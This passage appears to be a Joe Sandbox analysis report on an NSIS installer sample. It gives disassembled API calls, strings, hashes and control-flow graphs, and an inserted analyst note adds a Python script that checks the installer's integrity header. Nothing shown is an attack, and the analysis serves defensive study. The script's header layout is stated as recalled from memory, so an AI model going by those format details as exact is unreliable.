                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                      Strings
                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                      • ShowWindow.USER32(?), ref: 004054FE
                                                                                                      • DestroyWindow.USER32 ref: 00405512
                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                      • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3282139019-0
                                                                                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                      Control-flow Graph (edge list only; the rendered graph and its executed / not-executed colouring did not survive extraction. Node ids are basic-block address ranges, A->B is a successor edge, "call X" marks a subcall)
                                                                                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                      • API String ID: 608394941-2746725676
                                                                                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,%ReadyAdvised%,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,%ReadyAdvised%,%ReadyAdvised%,00000000,00000000,%ReadyAdvised%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                      • String ID: %ReadyAdvised%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                      • API String ID: 4286501637-4266961853
                                                                                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                      Control-flow Graph (edge list only; the rendered graph and its executed / not-executed colouring did not survive extraction. Node ids are basic-block address ranges, A->B is a successor edge, "call X" marks a subcall)
                                                                                                      control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                      • wsprintfW.USER32 ref: 004034CE
                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00427979,00403792,00000000), ref: 004034FF
                                                                                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                      • String ID: (]C$... %d%%$pAB$y9B$yyB
                                                                                                      • API String ID: 651206458-2355651534
                                                                                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                      Control-flow Graph (edge list only; the rendered graph and its executed / not-executed colouring did not survive extraction. Node ids are basic-block address ranges, A->B is a successor edge, "call X" marks a subcall)
                                                                                                      control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                      Strings
                                                                                                      • soft, xrefs: 004036A1
                                                                                                      • Null, xrefs: 004036AA
                                                                                                      • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 004037F1
                                                                                                      • Inst, xrefs: 00403698
                                                                                                      • Error launching installer, xrefs: 00403603
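                                                                                                      Analyst note (added example; this is neither Joe Sandbox output nor NSIS code): the function at 004035B3 is the NSIS stub's self-check. It opens its own image (GetModuleFileNameW, CreateFileW), takes GetFileSize, scans for the 12-byte "NullsoftInst" signature (the "Null", "soft" and "Inst" compares at 004036AA, 004036A1 and 00403698) and reports "Installer integrity check has failed" when the sizes recorded in that header do not fit the file. The Python below re-implements that locate-and-verify step so the same test can be run offline on a dropped sample, and so a truncated or patched installer can be told apart from an intact one before it is detonated. The firstheader layout, the flag values, the 512-byte scan step and the trailing whole-image CRC32 are this example's assumptions from memory of the NSIS file format, not facts taken from the report; build_sample() constructs a synthetic installer image so the script runs without file.exe.

```python
"""NSIS firstheader locator and integrity check (added analyst example).

Assumed firstheader layout (28 bytes, little-endian):
    flags:u32  siginfo:u32 (0xDEADBEEF)  magic:char[12] ("NullsoftInst")
    length_of_header:u32   length_of_all_following_data:u32
length_of_all_following_data is assumed to count from the start of the
firstheader to the end of the installer data, whose last 4 bytes hold a
CRC32 over everything in the file before them.
"""
import struct
import zlib
from dataclasses import dataclass
from typing import Optional

NSIS_SIGINFO = 0xDEADBEEF
NSIS_MAGIC = b"NullsoftInst"
FIRSTHEADER_FMT = "<II12sII"
FIRSTHEADER_SIZE = struct.calcsize(FIRSTHEADER_FMT)   # 28 bytes
SCAN_STEP = 512            # assumption: the stub only tests 512-byte boundaries
FH_FLAGS_UNINSTALL = 1     # assumed NSIS flag values
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8


@dataclass
class FirstHeader:
    offset: int                        # file offset of the signature block
    flags: int
    length_of_header: int              # size of the script header that follows
    length_of_all_following_data: int  # firstheader + header + data + CRC


def find_firstheader(data: bytes) -> Optional[FirstHeader]:
    """Mirror the stub's scan: test the signature at every SCAN_STEP offset."""
    last = len(data) - FIRSTHEADER_SIZE
    for off in range(0, last + 1, SCAN_STEP):
        flags, siginfo, magic, hdr_len, total = struct.unpack_from(FIRSTHEADER_FMT, data, off)
        if siginfo == NSIS_SIGINFO and magic == NSIS_MAGIC:
            return FirstHeader(off, flags, hdr_len, total)
    return None


def integrity_ok(data: bytes, fh: FirstHeader) -> bool:
    """The size test behind 'Installer integrity check has failed'."""
    return fh.offset + fh.length_of_all_following_data <= len(data)


def crc_ok(data: bytes, fh: FirstHeader) -> bool:
    """Whole-image CRC32 stored in the last 4 bytes of the installer data."""
    if fh.flags & FH_FLAGS_NO_CRC:
        return True
    end = fh.offset + fh.length_of_all_following_data
    (stored,) = struct.unpack_from("<I", data, end - 4)
    return (zlib.crc32(data[: end - 4]) & 0xFFFFFFFF) == stored


def verdict(data: bytes) -> str:
    """'not-nsis', 'truncated', 'crc-mismatch' or 'ok', in the order the stub decides."""
    fh = find_firstheader(data)
    if fh is None:
        return "not-nsis"
    if not integrity_ok(data, fh):
        return "truncated"
    if not crc_ok(data, fh):
        return "crc-mismatch"
    return "ok"


def build_sample(flags: int = 0, payload: bytes = b"\x00" * 100) -> bytes:
    """Constructed stand-in for an NSIS installer (not a real file): a fake
    1024-byte stub, the firstheader, a 64-byte header, the payload, then the CRC."""
    stub = b"MZ" + b"\x90" * (2 * SCAN_STEP - 2)
    hdr_len = 64
    total = FIRSTHEADER_SIZE + hdr_len + len(payload) + 4
    fh = struct.pack(FIRSTHEADER_FMT, flags, NSIS_SIGINFO, NSIS_MAGIC, hdr_len, total)
    body = stub + fh + b"\x11" * hdr_len + payload
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


if __name__ == "__main__":
    import sys
    # usage: python nsis_check.py <installer.exe>; with no argument the synthetic sample is used
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print("firstheader:", find_firstheader(image))
    print("verdict:", verdict(image))
```

                                                                                                      Running it on a sample that reports "not-nsis" while still carrying the "NSIS Error" and "NullsoftInst" strings usually means the signature was moved off a 512-byte boundary or the overlay was repacked; "truncated" corresponds to the error message string at 004037F1, and "crc-mismatch" is the case where the sizes still fit but the image was patched after build.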
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
